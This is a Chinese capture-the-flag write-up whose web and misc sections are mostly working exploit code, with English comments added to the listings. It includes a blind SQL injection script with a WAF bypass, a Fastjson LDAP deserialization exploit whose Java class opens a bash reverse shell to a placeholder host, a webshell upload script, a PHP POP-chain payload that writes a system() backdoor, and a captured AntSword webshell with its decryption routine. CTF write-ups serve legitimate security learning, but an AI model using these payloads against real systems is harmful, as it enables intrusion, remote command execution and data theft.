# 高校y
[toc]
# web
## ezcms
等官方修复了再放
## ezbypass
使用Nday 绕disable_functions
https://www.exploit-db.com/exploits/47462
## ezwaf
ModSecurity 的安装可参考这篇文章 https://hostadvice.com/how-to/how-to-setup-modsecurity-for-apache-on-ubuntu-18-04/ ，但不要添加文末的那两行配置。
通过访问 ?src= 即可看到源码。从源码可以看到，虽然对参数做了 mysqli_real_escape_string，但 age 是整数型参数，注入语句里不需要引号，转义也就起不到作用。后来测试了一下，sqlmap 直接就能跑出来，为了增加点难度我加了个 WAF（mod_security），需要找到绕 WAF 的方法。利用这篇文章 https://www.anquanke.com/post/id/169738 提到的方法可以绕过。
下面是利用脚本
```python
#!/usr/bin/env python3
# Time-based blind injection driven over a raw socket instead of an HTTP
# library, so the request headers are sent exactly as written in `tmp` below.
import socket
# 2 s receive timeout, deliberately shorter than the sleep(4) in the payload:
# a probe whose condition is true does not answer in time and raises.
socket.setdefaulttimeout(2)
# Request template; "payload" is substituted per probe. Note that the header
# set carries Content-Length together with Transfer-Encoding: chunked —
# presumably the ModSecurity bypass referenced above. A front end that rejects
# a request carrying both headers (the ambiguity RFC 7230 §3.3.3 warns about)
# would not be fooled by it. Host/port are the CTF instance.
tmp = """GET /?age=payload HTTP/1.1
Host: 111.186.57.117:43426
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Transfer-Encoding: chunked
a=hhh
"""
flag = ""
# The enumeration steps, one per assignment; only the last one is executed,
# the earlier ones stay as a record (the comments hold what each returned).
sql = "select user()"
sql = "select database()"
sql = "select group_concat(table_name) from information_schema.tables where table_schema=database()" #flag_xdd
sql = "select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x666c61675f786464" #flag_32122
sql = "select flag_32122 from flag_xdd limit 1"
# Up to 63 characters, each resolved by trying all 256 byte values.
for i in range(1, 64):
    for j in range(256):
        try:
            client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            client.connect(("111.186.57.117",43426))
            # When the i-th byte equals j the server sleeps 4 s, which
            # exceeds the 2 s timeout set above.
            payload = "1 or if(ascii(substr((%s), %d, 1))=%d, sleep(4), 0)"%(sql, i, j)
            # print(payload)
            # Spaces are the only characters URL-encoded by hand.
            payload = payload.replace(" ", "%20")
            tmp1 = tmp.replace("payload", payload)
            # HTTP requires CRLF line endings.
            data = tmp1.replace("\n", "\r\n")
            # print(repr(data))
            # input()
            client.send(data.encode())
            response = client.recv(4096)
            # print(response)
        # Any exception — not only socket.timeout — reaches this branch; the
        # socket is never closed explicitly either.
        except Exception as e:
            print(e)
            # Indentation was lost in the original listing; these two lines
            # only make sense inside the except branch, which is how they are
            # placed here — confirm. No break follows, so the remaining j
            # values are still probed after a hit.
            flag += chr(j)
            print(flag)
```
## ezjava
Fastjson 的反序列化。jdk 用的是 `jdk1.8.0_181`，这个版本不能用 rmi，需要使用 ldap。另外还有个坑：可能需要把 hostname 修改为外网 ip。
服务器端执行:
```
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://202.120.7.206:8080/#EvilObject
```
服务器端执行:
```
python3 -m http.server 8080
```
`EvilObject.java` 内容如下，写好后用 `javac EvilObject.java` 编译：
```java
// Class referenced by the LDAP entry served above (…/#EvilObject). All of the
// logic sits in the constructor, so merely instantiating the class runs the
// command; "yourvps.ip" is a placeholder for the listener host.
public class EvilObject {
    public EvilObject(){
        try{
            String[] cmd = {"/bin/bash", "-c", "bash -i >& /dev/tcp/yourvps.ip/9898 0>&1"};
            java.lang.Runtime.getRuntime().exec(cmd);
        }catch (Exception e){
            // Failures are only printed; the constructor never throws.
            e.printStackTrace();
        }
    }
}
```
payload
```json
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://yourvps.ip:1389/EvilObject","autoCommit":true}}}
```
## ezupload
```python
#!/usr/bin/env python3
import requests
# One shared session so any cookie set by login() carries over to upload()
# and excute().
s = requests.Session()
# When True, every request is routed through the local proxy at 127.0.0.1:8080.
debug = False
def login():
    """POST a username to login.php on the shared session and print the reply.

    Only the `username` field is sent; 'xxxx' is the placeholder value used here.
    """
    url = 'http://111.186.57.61:10501/login.php'
    headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
    data = {'username':'xxxx'}
    # Interception proxy, only used when debug is set.
    proxies = {'http':'http://127.0.0.1:8080'}
    if debug:
        r = s.post(url, data=data, headers=headers, proxies=proxies)
    else:
        r = s.post(url, data=data, headers=headers)
    print(r.text)
def upload():
    """Upload bqb2.jpg to upload.php under the file name x.phtml and print the reply.

    The multipart part is declared as image/png while the name ends in .phtml,
    i.e. the server-side check presumably keys on the declared type and/or
    image content rather than on the extension — confirm. A check that
    allow-lists extensions, renames on save and keeps uploads outside the
    web root would not accept this file.
    """
    url = 'http://111.186.57.61:10501/upload.php'
    headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
    data = {'name':'username'}
    # (field name, (file name, file object, content type)); the file handle is
    # never closed here.
    files = [('avatar', ('x.phtml', open('bqb2.jpg', 'rb'), 'image/png'))]
    proxies = {'http':'http://127.0.0.1:8080'}
    if debug:
        r = s.post(url, data=data, files=files, headers=headers, proxies=proxies)
    else:
        r = s.post(url, data=data, files=files, headers=headers)
    print(r.text)
def excute(cmd):
    """GET the uploaded x.phtml with c=system('<cmd>'); and print the response.

    Assumes the uploaded file evaluates its `c` query parameter (the contents of
    bqb2.jpg are not shown here). The name is a typo of "execute" kept as-is
    because it is the public name used from __main__.
    """
    url = "http://111.186.57.61:10501/uploads/x.phtml"
    r = s.get(url, params={"c":"system('%s');"%cmd})
    print(r.text)
# Entry point: log in, upload the file, then run /readflag through it.
if __name__ == "__main__":
    login()
    upload()
    excute("/readflag")
```
## ezpop
```python
#!/usr/bin/env python3
import requests
import base64
# When True, upload() goes through the local proxy at 127.0.0.1:8080.
debug = False
# Target base URL; execute() appends the path of the written file.
url = 'http://111.186.57.43:10401/'
def upload():
    """Send the serialized PHP object as the `data` query parameter and print the reply.

    The base64 below is what the PHP generator script further down prints
    (base64_encode(serialize($a))); it is decoded first, so the raw serialized
    object is what travels in the request. Its cache entry decodes to
    `<?php system($_GET[1]);?>ff`, which is why execute() uses parameter "1".
    """
    cookie = 'xxx'
    headers = {'Cookie':cookie, 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
    data = base64.b64decode(b"TzoxOiJBIjo1OntzOjg6IgAqAHN0b3JlIjtPOjE6IkIiOjI6e3M6Nzoib3B0aW9ucyI7YTozOntzOjY6InByZWZpeCI7czo1NDoicGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWRlY29kZS9yZXNvdXJjZT0uL3VwbG9hZHMvIjtzOjk6InNlcmlhbGl6ZSI7czo5OiJzZXJpYWxpemUiO3M6MTM6ImRhdGFfY29tcHJlc3MiO2I6MDt9czoxMDoid3JpdGVUaW1lcyI7aTowO31zOjY6IgAqAGtleSI7czo3OiJ4eHgucGhwIjtzOjk6IgAqAGV4cGlyZSI7aToxMjM7czo4OiJhdXRvc2F2ZSI7YjowO3M6NToiY2FjaGUiO2E6MTp7aTowO3M6MzY6IlBEOXdhSEFnYzNsemRHVnRLQ1JmUjBWVVd6RmRLVHMvUG1abSI7fX0=")
    params = {'data':data}
    proxies = {'http':'http://127.0.0.1:8080'}
    if debug:
        r = requests.get(url, params=params, headers=headers, proxies=proxies)
    else:
        r = requests.get(url, params=params, headers=headers)
    print(r.text)
def execute(cmd):
    """GET uploads/xxx.php (the file the POP chain writes) with cmd as parameter 1."""
    # `url` already ends with "/", so the request path contains "//uploads".
    r = requests.get(url+"/uploads/xxx.php", params={"1":cmd})
    print(r.text)
# Entry point: deliver the serialized object, then read the flag through the
# file it writes.
if __name__ == "__main__":
    upload()
    execute("cat /flag*")
```
```php
<?php
// error_reporting(0);
/**
 * First gadget of the chain (appears modelled on a Flysystem cache adapter —
 * verify). Nothing here is called directly: once an object of this class is
 * rebuilt by unserialize() and later destroyed, __destruct() runs save(),
 * which hands $this->cache to $this->store->set() under $this->key. That is
 * what turns an unserialize() of attacker-controlled input into the file write
 * in class B; unserialize($s, ['allowed_classes' => false]) or a non-object
 * format such as JSON removes this entry point.
 */
class A{
    protected $store;
    protected $key;
    protected $expire;
    public function __construct()
    {
        // autosave, cache and complete are not declared above; they are
        // created here as dynamic properties so they end up in the serialized
        // object (complete is never assigned and therefore encodes as null).
        $this->autosave = false;
        // File name passed to B::set(); B's prefix supplies the directory.
        $this->key = "xxx.php";
        $this->store = new B();
        $this->expire = 123;
        // base64 of the PHP that ends up in the written file.
        $this->cache = ["PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/PmZm"];
    }
    // Keeps only a fixed set of keys for array-valued entries; the single
    // string entry above is not an array and passes through untouched.
    public function cleanContents(array $contents)
    {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);
        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }
        return $contents;
    }
    // JSON of [cleaned cache, complete]; with the values set above this is
    // the base64 string wrapped in JSON array syntax, followed by null.
    public function getForStorage()
    {
        $cleaned = $this->cleanContents($this->cache);
        return json_encode([$cleaned, $this->complete]);
    }
    // The sink: delegates the actual write to the store (class B).
    public function save()
    {
        $contents = $this->getForStorage();
        $this->store->set($this->key, $contents, $this->expire);
    }
    // Trigger: autosave is false, so every destruction of an A calls save().
    public function __destruct()
    {
        if (! $this->autosave) {
            $this->save();
        }
    }
}
/**
 * Second gadget: a file-cache driver (appears modelled on a framework file
 * cache driver — verify) whose set() writes to options['prefix'] . $name.
 * Here the prefix is a php://filter wrapper that base64-decodes everything
 * written to it, so the "exit();" guard that set() prepends does not survive
 * as PHP code while the base64 cache entry supplied by class A decodes into
 * real PHP under ./uploads/xxx.php (presumably the reason the entry ends in
 * "ff" — alignment of the decoded stream; confirm).
 */
class B{
    public $options;
    public function __construct()
    {
        // Not a declared property; created here so it is serialized too.
        $this->writeTimes = 0;
        // Decoding filter placed in front of the real target directory.
        $this->options["prefix"] = "php://filter/convert.base64-decode/resource=./uploads/";
        // Name of the callable used by serialize() below.
        $this->options['serialize'] = "serialize";
        $this->options['data_compress'] = false;
    }
    protected function getExpireTime($expire): int
    {
        return (int) $expire;
    }
    // Target path = prefix . name; no normalisation of $name takes place.
    public function getCacheKey(string $name): string
    {
        return $this->options['prefix'] . $name;
    }
    // Numeric data is stringified; anything else goes through the callable
    // named in options['serialize'] (here PHP's serialize()).
    protected function serialize($data): string
    {
        if (is_numeric($data)) {
            return (string) $data;
        }
        $serialize = $this->options['serialize'];
        return $serialize($data);
    }
    // Writes guard + serialized value to the computed path and reports success.
    // options['expire'] is never set in this class, so a null $expire would
    // read an undefined index; class A always passes 123.
    public function set($name, $value, $expire = null): bool
    {
        $this->writeTimes++;
        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }
        $expire = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);
        $dir = dirname($filename);
        // dirname() of the php://filter path is not a real directory, which is
        // presumably why the generator script creates ./uploads itself.
        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // creation failed
            }
        }
        $data = $this->serialize($value);
        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            // data compression
            $data = gzcompress($data, 3);
        }
        // Guard header with the zero-padded expiry; see the class comment for
        // why it does not survive the decoding filter.
        $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        // Debug output of what is written and where.
        echo $data;
        echo $filename;
        $result = file_put_contents($filename, $data);
        if ($result) {
            return true;
        }
        return false;
    }
}
// Make sure ./uploads exists locally: besides printing the payload, the
// __destruct of $a fires at script end and B::set() then attempts the write
// on the generating machine as well (the echo calls in set() show it).
$dir = "uploads/";
if (!is_dir($dir))
{
    mkdir($dir);
}
$a = new A();
// The base64 printed here is what ezpop.py decodes and sends as `data`.
$s = serialize($a);
echo base64_encode($s);
```
# misc
## Webshell
蚁剑流量分析
```php
// AntSword (蚁剑) PHP payload as captured on the wire, reproduced unchanged.
// Indicators visible in this sample: POST fields "0x1b4d456c7297d" (program,
// base64) and "0xb9b45688a5a08" (command string, base64); the reply is the
// output buffer base64-encoded, AES-128-ECB-encrypted with the fixed key in
// asenc(), base64-encoded again and framed by the literals "8c2b4" … "e2e10".
// fe() consults disable_functions and runcmd() falls through system, passthru,
// shell_exec, exec, popen and antsystem; the command is run with " 2>&1"
// appended and a non-zero exit status is reported as "ret=<n>".
@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){@session_start();$key='f5045b05abe6ec9b1e37fafa851f5de9';return @base64_encode(openssl_encrypt(base64_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));};;function asoutput(){$output=ob_get_contents();ob_end_clean();echo "8c2b4";echo @asenc($output);echo "e2e10";}ob_start();try{$p=base64_decode($_POST["0x1b4d456c7297d"]);$s=base64_decode($_POST["0xb9b45688a5a08"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";function fe($f){$d=explode(",",@ini_get("disable_functions"));if(empty($d)){$d=array();}else{$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};function runcmd($c){$ret=0;if(fe('system')){@system($c,$ret);}elseif(fe('passthru')){@passthru($c,$ret);}elseif(fe('shell_exec')){print(@shell_exec($c));}elseif(fe('exec')){@exec($c,$o,$ret);print(join("
",$o));}elseif(fe('popen')){$fp=@popen($c,'r');while(!@feof($fp)){print(@fgets($fp, 2048));}@pclose($fp);}elseif(fe('antsystem')){@antsystem($c);}else{$ret = 127;}return $ret;};$ret=@runcmd($r." 2>&1");print ($ret!=0)?"ret={$ret}":"";;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();
```
从上面可以看到，返回值使用了 AES-128-ECB 加密，密钥就写在 payload 里，可用下面脚本解密：
```php
<?php
// Inverse of asenc() in the captured payload: strip the outer base64,
// decrypt with the key hard-coded in the webshell, then undo the inner
// base64 of the output buffer.
$key = "f5045b05abe6ec9b1e37fafa851f5de9";
// Ciphertext taken from the captured response (the part between the
// "8c2b4" and "e2e10" markers that asoutput() emits).
$enc = "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";
$msg = openssl_decrypt(base64_decode($enc), 'AES-128-ECB', $key, OPENSSL_RAW_DATA);
echo $msg;
// First decode undoes asenc()'s base64_encode($out). The second decode
// presumably reflects command output that was itself base64 in the captured
// sample — confirm against the traffic before reusing.
$msg = base64_decode($msg);
echo base64_decode($msg);
```